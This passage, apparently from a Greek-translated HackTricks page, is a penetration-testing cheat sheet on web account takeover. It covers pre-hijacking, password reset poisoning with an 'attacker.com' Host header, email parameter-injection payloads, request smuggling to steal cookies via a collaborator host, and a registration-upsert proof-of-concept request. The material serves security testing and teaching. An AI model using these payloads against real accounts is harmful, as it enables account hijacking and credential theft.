def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: υποβάλετε το ίδιο έγκυρο OTP ταυτόχρονα σε δύο sessions· μερικές φορές μία συνεδρία γίνεται verified attacker account ενώ το victim flow επίσης πετυχαίνει.
- Δοκιμάστε επίσης Host header poisoning σε verification links (όπως το reset poisoning παρακάτω) για να leak ή να ολοκληρώσετε verification σε attacker controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

A powerful class of issues occurs when an attacker performs actions on the victim’s email before the victim creates their account, then regains access later.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
  - Attacker: δημιουργεί έναν classic account με το victim email και ορίζει password
  - Victim: εγγράφεται αργότερα με SSO (ίδιο email)
  - Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
  - Attacker: creates account and holds a long‑lived session (don’t log out)
  - Victim: recovers/sets password and uses the account
  - Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
  - Attacker: adds a secondary identifier to the pre‑created account (phone, additional email, or links attacker’s IdP)
  - Victim: resets password; attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
  - Attacker: initiates email‑change to attacker mail and withholds confirmation
  - Victim: recovers the account and starts using it
  - Attacker: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
  - Attacker: uses an IdP that does not verify email ownership to assert `victim@…`
  - Victim: signs up via classic route
  - Service merges on email without checking `email_verified` or performing local verification

Πρακτικές συμβουλές

- Συλλέξτε flows και endpoints από web/mobile bundles. Αναζητήστε classic signup, SSO linking, email/phone change, και password reset endpoints.
- Δημιουργήστε ρεαλιστική αυτοματοποίηση για να διατηρείτε sessions ενεργά ενώ ελέγχετε άλλες ροές.
- Για SSO tests, στήστε έναν test OIDC provider και εκδώστε tokens με `email` claims για τη διεύθυνση του victim και `email_verified=false` για να ελέγξετε αν το RP εμπιστεύεται unverified IdPs.
- Μετά από οποιοδήποτε password reset ή αλλαγή email, επιβεβαιώστε ότι:
  - όλα τα άλλα sessions και tokens είναι invalidated,
  - οι εκκρεμείς δυνατότητες αλλαγής email/phone έχουν ακυρωθεί,
  - τα προηγουμένως linked IdPs/emails/phones έχουν επαληθευτεί εκ νέου.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR σε API Parameters

1. Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να πάει στη λειτουργία Change password.
2. Ξεκινήστε το Burp Suite και Intercept το request\
3. Στείλτε το στο repeater tab και επεξεργαστείτε τις παραμέτρους : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Αδύναμο token επαναφοράς κωδικού

Το password reset token θα πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά.
Προσπαθήστε να καθορίσετε αν το token λήγει ή αν είναι πάντα το ίδιο — σε κάποιες περιπτώσεις ο αλγόριθμος γεννήτριας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιούνται από τον αλγόριθμο.

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Leaking Password Reset Token

1. Trigger ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για ένα συγκεκριμένο email π.χ.: test@mail.com
2. Inspect την απάντηση του server και ελέγξτε για resetToken
3. Στη συνέχεια χρησιμοποιήστε το token σε ένα URL όπως https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Επαναφορά κωδικού μέσω Username Collision

1. Εγγραφείτε στο σύστημα με ένα username ίδιο με το username του θύματος, αλλά με κενά εισαγμένα πριν και/ή μετά το username. π.χ: "admin "
2. Ζητήστε επαναφορά κωδικού με το κακόβουλο username σας.
3. Χρησιμοποιήστε το token που στάλθηκε στο email σας και επαναφέρετε τον κωδικό του θύματος.
4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.

Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτή την επίθεση.
Δείτε: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. Βρείτε ένα XSS μέσα στην εφαρμογή ή σε ένα subdomain εάν τα cookies είναι scoped στο parent domain : *.domain.com
2. Leak το τρέχον sessions cookie
3. Authenticate ως ο χρήστης χρησιμοποιώντας το cookie

Account Takeover Via HTTP Request Smuggling

1. Χρησιμοποιήστε smuggler για να εντοπίσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Κατασκευάστε ένα request που θα overwrite το POST / HTTP/1.1 με τα ακόλουθα δεδομένα:
   GET http://something.burpcollaborator.net HTTP/1.1 X: με στόχο να κάνετε open redirect τα θύματα στο burpcollab και να κλέψετε τα cookies τους\
3. Το τελικό request μπορεί να μοιάζει με το ακόλουθο

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Αναφορές Hackerone για την εκμετάλλευση αυτού του bug\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Κατάληψη λογαριασμού μέσω CSRF

1. Δημιουργήστε ένα payload για το CSRF, π.χ.: “HTML φόρμα με αυτόματη υποβολή για αλλαγή κωδικού”
2. Στείλτε το payload

Κατάληψη λογαριασμού μέσω JWT

JSON Web Token μπορεί να χρησιμοποιηθεί για την πιστοποίηση ενός χρήστη.

• Επεξεργαστείτε το JWT με άλλο User ID / Email
• Ελέγξτε για ασθενή υπογραφή JWT

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Ορισμένοι signup handlers κάνουν upsert όταν το παρεχόμενο email υπάρχει ήδη. Αν το endpoint αποδέχεται ένα ελάχιστο body με email και password και δεν επιβάλλει επαλήθευση ιδιοκτησίας, η αποστολή του email του θύματος θα αντικαταστήσει τον κωδικό τους pre-auth.

• Discovery: συγκομίστε ονόματα endpoint από bundled JS (ή mobile app traffic), και μετά fuzz-άρετε base paths όπως /parents/application/v4/admin/FUZZ χρησιμοποιώντας ffuf/dirsearch.
• Method hints: ένα GET που επιστρέφει μηνύματα όπως “Only POST request is allowed.” συχνά υποδεικνύει το σωστό verb και ότι αναμένεται JSON body.
• Minimal body observed in the wild:

{"email":"victim@example.com","password":"New@12345"}

Παράδειγμα PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Επίπτωση: Πλήρης Account Takeover (ATO) χωρίς κανένα reset token, OTP ή επαλήθευση email.

Αναφορές

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.